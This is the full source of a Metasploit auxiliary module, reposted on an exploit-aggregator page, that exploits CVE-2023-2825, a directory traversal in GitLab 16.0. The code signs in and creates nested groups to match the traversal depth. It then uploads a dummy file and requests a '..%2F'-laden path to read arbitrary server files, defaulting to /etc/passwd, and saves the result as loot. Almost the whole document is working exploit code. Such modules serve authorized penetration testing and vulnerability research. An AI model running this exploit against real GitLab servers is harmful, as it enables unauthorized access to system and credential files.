Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-GITLAB_AUTHENTICATED_SUBGROUPS_FILE_READ-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Gitlab
  include Msf::Auxiliary::Report
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GitLab Authenticated File Read',
        'Description' => %q{
          GitLab version 16.0 contains a directory traversal for arbitrary file read
          as the `gitlab-www` user. This module requires authentication for exploitation.
          In order to use this module, a user must be able to create a project and groups.
          When exploiting this vulnerability, there is a direct correlation between the traversal
          depth, and the depth of groups the vulnerable project is in. The minimum for this seems
          to be 5, but up to 11 have also been observed. An example of this, is if the directory
          traversal needs a depth of 11, a group
          and 10 nested child groups, each a sub of the previous, will be created (adding up to 11).
          Visually this looks like:
          Group1->sub1->sub2->sub3->sub4->sub5->sub6->sub7->sub8->sub9->sub10.
          If the depth was 5, a group and 4 nested child groups would be created.
          With all these requirements satisfied a dummy file is uploaded, and the full
          traversal is then executed. Cleanup is performed by deleting the first group which
          cascades to deleting all other objects created.
        },
        'Author' => [
          'h00die', # MSF module
          'pwnie', # Discovery on HackerOne
          'Vitellozzo' # PoC on Github
        ],
        'References' => [
          ['URL', 'https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/'],
          ['URL', 'https://github.com/Occamsec/CVE-2023-2825'],
          ['URL', 'https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/'],
          ['CVE', '2023-2825']
        ],
        'DisclosureDate' => '2023-05-23',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal (also groups creation)', 11]),
        OptString.new('FILE', [true, 'File to read', '/etc/passwd'])
      ]
    )
    deregister_options('GIT_URI')
  end

  def get_csrf(body)
    if body.empty?
      fail_with(Failure::UnexpectedReply, "HTML response had an empty body, couldn't find CSRF, unable to continue")
    end

    body =~ /"csrf-token" content="([^"]+)"/

    if ::Regexp.last_match(1).nil?
      fail_with(Failure::UnexpectedReply, 'CSRF token not found in response, unable to continue')
    end
    ::Regexp.last_match(1)
  end

  def check
    # check method almost entirely borrowed from gitlab_github_import_rce_cve_2022_2992
    @cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD'])

    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if @cookie.nil?

    vprint_status('Trying to get the GitLab version')

    version = Rex::Version.new(gitlab_version)

    if version != Rex::Version.new('16.0.0')
      return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable")
    end

    report_vuln(
      host: rhost,
      name: name,
      refs: references,
      info: [version]
    )

    return Exploit::CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
    return Exploit::CheckCode::Detected('Could not detect the version because authentication failed.')
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError => e
    return Exploit::CheckCode::Unknown("#{e.class} - #{e.message}")
  end

  def run
    if datastore['DEPTH'] < 5
      print_bad('A DEPTH of < 5 is unlikely to succeed as almost all observed installs require 5-11 depth.')
    end

    begin
      @cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) if @cookie.nil?
    rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
      fail_with(Failure::NoAccess, 'Unable to authenticate, check credentials')
    end

    fail_with(Failure::NoAccess, 'Unable to retrieve cookie') if @cookie.nil?

    # get our csrf token
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path)
    })
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
    csrf_token = get_csrf(res.body)
    vprint_good("CSRF Token: #{csrf_token}")

    # create nested groups to the appropriate depth
    print_status("Creating #{datastore['DEPTH']} groups")
    parent_id = ''
    first_group = ''
    (1..datastore['DEPTH']).each do |_|
      name = Rex::Text.rand_text_alphanumeric(8, 10)
      if first_group.empty?
        first_group = name
        vprint_status("Creating group: #{name}")
      else
        vprint_status("Creating child group: #{name} with parent id: #{parent_id}")
      end
      # a success will give a 302 and direct us to /<group_name>
      res = send_request_cgi!({
        'uri' => normalize_uri(target_uri.path, 'groups'),
        'method' => 'POST',
        'vars_post' => {
          'group[parent_id]' => parent_id,
          'group[name]' => name,
          'group[path]' => name,
          'group[visibility_level]' => 20,
          'user[role]' => 'software_developer',
          'group[jobs_to_be_done]' => '',
          'authenticity_token' => csrf_token
        }
      })
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
      csrf_token = get_csrf(res.body)
      vprint_good("CSRF Token: #{csrf_token}")

      # grab our parent group ID for nesting
      res.body =~ /data-clipboard-text="([^"]+)" type="button" title="Copy group ID"/
      parent_id = ::Regexp.last_match(1)
      fail_with(Failure::UnexpectedReply, "#{peer} - Cannot retrieve the parent ID from the HTML response") unless parent_id
    end

    # create a new project

    project_name = Rex::Text.rand_text_alphanumeric(8, 10)
    print_status("Creating project #{project_name}")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'projects'),
      'method' => 'POST',
      'vars_post' => {
        'project[ci_cd_only]' => 'false',
        'project[name]' => project_name,
        'project[selected_namespace_id]' => parent_id,
        'project[namespace_id]' => parent_id,
        'project[path]' => project_name,
        'project[visibility_level]' => 20,
        'project[initialize_with_readme]' => 1, # The POC is missing a ] here, fingerprintable?
        'authenticity_token' => csrf_token
      }
    })
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 302

    project_id = URI(res.headers['Location']).path

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, project_id)
    })
    csrf_token = get_csrf(res.body)

    # upload a dummy file
    print_status('Creating a dummy file in project')
    file_name = Rex::Text.rand_text_alphanumeric(8, 10)
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, project_id, 'uploads'),
      'method' => 'POST',
      'headers' => {
        'X-CSRF-Token' => csrf_token,
        'Accept' => '*/*' # required or you get a 404
      },
      'vars_form_data' => [
        {
          'name' => 'file',
          'filename' => file_name,
          'data' => Rex::Text.rand_text_alphanumeric(4, 25)
        }
      ]
    })
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
    res = res.get_json_document
    file_url = res.dig('link', 'url')
    if file_url.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to determine file upload URL, possible permissions issue")
    end
    # remove our file name
    file_url = file_url.gsub("/#{file_name}", '')

    # finally, read our file
    print_status('Executing dir traversal')
    target_file = datastore['FILE']
    target_file = target_file.gsub('/', '%2F')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, project_id, file_url, '..%2F' * datastore['DEPTH'] + "..#{target_file}"),
      'headers' => {
        'Accept' => '*/*' # required or you get a 404
      }
    })
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    if res.code == 500
      print_error("Unable to read file (permissions, or file doesn't exist)")
    elsif res.code != 200
      print_error("#{peer} - Unexpected response code (#{res.code})") # don't fail_with so we can cleanup
    end

    if res.body.empty?
      print_error('Response has 0 size.')
    elsif res.code == 200
      print_good(res.body)
      loot_path = store_loot('GitLab file', 'text/plain', datastore['RHOST'], res.body, datastore['FILE'])
      print_good("#{datastore['FILE']} saved to #{loot_path}")
    else
      print_error('Bad response, initiating cleanup')
    end

    # deleting the first group will delete the sub-groups and project
    print_status("Deleting group #{first_group}")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, first_group),
      'method' => 'POST',
      'vars_post' => {
        'authenticity_token' => csrf_token,
        '_method' => 'delete'
      }
    })
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 302
  end
end